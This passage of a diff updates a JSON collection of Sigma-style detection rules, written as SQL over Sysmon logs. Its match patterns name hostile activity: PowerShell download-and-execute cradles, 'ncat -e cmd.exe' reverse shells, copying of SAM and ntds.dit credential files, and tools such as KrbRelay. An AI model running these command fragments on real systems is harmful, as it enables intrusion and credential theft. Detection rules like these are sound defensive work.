* FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate import of keys" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND 
(User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon 
OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', 
'7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" - }, - { - 
"title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - 
"author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the 
execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron 
Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": 
"Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' 
AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_susp_child_process_2.yml" + "filename": 
"proc_creation_win_msiexec_dll.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.resource_development", + "attack.t1587.001", "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Some 